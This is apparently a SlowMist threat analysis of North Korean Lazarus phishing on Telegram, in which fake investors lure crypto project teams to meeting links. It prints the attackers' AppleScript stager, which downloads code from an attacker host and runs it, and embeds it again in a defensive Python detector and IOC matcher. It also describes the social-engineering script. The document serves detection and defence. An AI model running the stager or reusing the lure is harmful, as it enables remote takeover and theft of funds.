SlowMist: Analysis of Targeted Fraud Attacks by North Korean Hackers on Telegram

1 year ago

North Korean hackers have begun impersonating well-known investment institutions to defraud project parties, with a significant impact.

Authored by: 23pds@SlowMist Security Team

Background

As early as 2022, the SlowMist Security Team discovered through the SlowMist BTI Intelligence Network that North Korean hackers from the Lazarus group had launched a large-scale Telegram fraud phishing operation targeting the cryptocurrency industry. Recently, North Korean hackers have even begun impersonating well-known investment institutions to defraud project parties. Given the significant impact, SlowMist is conducting an analysis here.

Tactics

  1. Select a well-known investment institution as the impersonation target, then create a fake Telegram account:

  2. Target well-known DeFi project parties, claiming to want to invest in them, and use the fake account to carry out the scam:

North Korean hackers will initiate a chat with the target to establish contact. If the project party sees the message and lacks security awareness, the following scene may occur:

After gaining the trust of the project party, North Korean hackers will begin to schedule meetings. There are two attack methods here:

  1. Invite the project party to a meeting on a platform such as ***.group-meeting.team, pretending to ask about availability or to arrange a detailed discussion, and proactively send a malicious meeting link. When the project party clicks the link, they are shown a "regional access restriction" error. The North Korean hackers then persuade the project party to download and run a script they provide for "location modification." Once the project party does so, their computer is under the hackers' control, leading to fund theft. Below is the content of the malicious script IP_Request.scpt:

-- Stage 1: the hard-coded second-stage URL
set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"

-- Stage 2: download it with curl; -L follows redirects, -k disables TLS certificate checks
set sc to do shell script "curl -L -k \"" & fix_url & "\""

-- Stage 3: execute whatever the server returned as AppleScript
run script sc

Code Explanation:

The script stores the attacker's URL in fix_url, then uses do shell script to run curl against it. The -L flag follows any redirects and -k tells curl to ignore TLS certificate errors, so the attacker does not need a valid certificate for the domain. The response body is captured in the variable sc, and run script sc executes that downloaded text as AppleScript with the privileges of the user who ran IP_Request.scpt. The file itself contains no payload: the actual malicious code is fetched at run time, which lets the attacker change it at will and keeps it out of the file a victim might inspect.

  2. Use the "Add Custom Link" feature of the Calendly meeting scheduling system to insert a malicious link into the event page and launch a phishing attack from there. Because Calendly fits naturally into the daily workflow of most project parties, these malicious links are not easily suspected, and a project party may inadvertently click the link, then download and execute malicious code. At that point the North Korean hackers can likewise obtain information or permissions on the project party's system.

The SlowMist Security Team also issued a warning about these attack methods on November 30, 2023:

Basic IOC:

IP: 104.168.137.21

Domains:

Malicious Attack Examples:
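As an added example (not part of SlowMist's writeup), the Python below shows two detections a defender can build from the material above: a scanner that flags AppleScript files with the fetch-and-execute shape of IP_Request.scpt (a do shell script curl/wget whose output is passed to run script) and extracts the URLs they contact, and an IOC matcher that checks egress log lines against the IP listed under Basic IOC and the two group-meeting domains seen in the attack. The log format, the hostnames mac-01/mac-02, the 198.51.100.x/203.0.113.x addresses and the meet. subdomain are constructed for the example; only the IOC IP, the group-meeting domains and the script body come from the page.

```python
import re
from urllib.parse import urlparse

# Indicators from the SlowMist writeup: the IP listed under "Basic IOC" and the
# two group-meeting domains (fake meeting platform / second-stage download).
# Any host under these domains is treated as a hit.
IOC_IPS = {"104.168.137.21"}
IOC_DOMAIN_SUFFIXES = ("group-meeting.online", "group-meeting.team")

# `set <var> to do shell script "curl|wget ..."` followed by `run script <var>`
# is the fetch-and-execute stager shape of IP_Request.scpt.
ASSIGN_FETCH_RE = re.compile(
    r'set\s+(\w+)\s+to\s+do shell script\s+"(?:curl|wget)\b', re.IGNORECASE)
RUN_SCRIPT_RE = re.compile(r'\brun script\s+(\w+)', re.IGNORECASE)
# Inline variant with no intermediate variable: run script (do shell script "curl ...")
INLINE_FETCH_RUN_RE = re.compile(
    r'run script\s*\(\s*do shell script\s+"(?:curl|wget)\b', re.IGNORECASE)
URL_RE = re.compile(r'https?://[^\s"\']+')


def host_is_ioc(host: str) -> bool:
    """True if host equals, or is a subdomain of, an IOC domain."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in IOC_DOMAIN_SUFFIXES)


def analyze_applescript(text: str) -> dict:
    """Flag AppleScript that downloads content and hands it to `run script`."""
    fetched = {m.group(1) for m in ASSIGN_FETCH_RE.finditer(text)}
    executed = {m.group(1) for m in RUN_SCRIPT_RE.finditer(text)}
    stager = bool(fetched & executed) or INLINE_FETCH_RUN_RE.search(text) is not None
    urls = URL_RE.findall(text)
    hosts = [urlparse(u).hostname or "" for u in urls]
    return {
        "stager": stager,
        "urls": urls,
        "ioc_hosts": sorted({h for h in hosts if host_is_ioc(h)}),
    }


# Constructed egress log format: "<ts> <host> dst=<ip>:<port> sni=<name|->"
LOG_RE = re.compile(r"dst=(?P<ip>[\d.]+):(?P<port>\d+)\s+sni=(?P<sni>\S+)")


def match_ioc_logs(lines) -> list:
    """Return (line_no, reason) for every log line whose destination matches an IOC."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        if m["ip"] in IOC_IPS:
            hits.append((n, f"ioc-ip {m['ip']}"))
        elif m["sni"] != "-" and host_is_ioc(m["sni"]):
            hits.append((n, f"ioc-domain {m['sni']}"))
    return hits


# The IP_Request.scpt body from the writeup.
SAMPLE_STAGER = r'''
set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"
set sc to do shell script "curl -L -k \"" & fix_url & "\""
run script sc
'''

# Constructed benign script: no download, nothing executed.
SAMPLE_BENIGN = '''
tell application "System Events"
    display dialog "Meeting starts in 5 minutes"
end tell
'''

# Constructed: downloads text but only displays it, so it is not a stager.
SAMPLE_FETCH_NO_RUN = '''
set ver to do shell script "curl -s https://example.com/version.txt"
display dialog ver
'''

# Constructed log lines; only the IOC IP and the group-meeting domains come from the writeup.
SAMPLE_LOGS = [
    "2023-11-30T10:01:02Z mac-01 dst=104.168.137.21:443 sni=support.group-meeting.online",
    "2023-11-30T10:01:05Z mac-01 dst=198.51.100.20:443 sni=www.example.com",
    "2023-11-30T10:02:11Z mac-02 dst=104.168.137.21:80 sni=-",
    "2023-11-30T10:03:40Z mac-02 dst=203.0.113.7:443 sni=meet.group-meeting.team",
]

if __name__ == "__main__":
    for name, text in [("stager", SAMPLE_STAGER), ("benign", SAMPLE_BENIGN),
                       ("fetch-only", SAMPLE_FETCH_NO_RUN)]:
        print(name, analyze_applescript(text))
    print(match_ioc_logs(SAMPLE_LOGS))
```

The script scanner keys on the combination of a download and run script rather than on curl alone, so an AppleScript that merely fetches a version string is reported with its URL but not as a stager; the IOC matcher checks the destination IP first and falls back to the TLS SNI so that a hit on a new address under a known domain is still caught.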

Conclusion

Given that such fraudulent activities are still ongoing, Web3 users are advised to confirm the authenticity of the other party through dual-channel confirmation when adding friends (verifying the contact through a second, independent channel, such as a known phone number or an official email address, rather than trusting the Telegram profile alone), and to keep two-factor authentication (2FA) enabled on Telegram at all times, to secure transactions and prevent financial losses.

If a related trojan has been run inadvertently, transfer the relevant funds to a safe wallet as soon as possible, disconnect the computer from the network, run antivirus software, and change the passwords of relevant accounts (including those saved in the browser on that computer) and other credentials; do this from a different, clean device, since a compromised computer cannot be trusted with the new passwords.
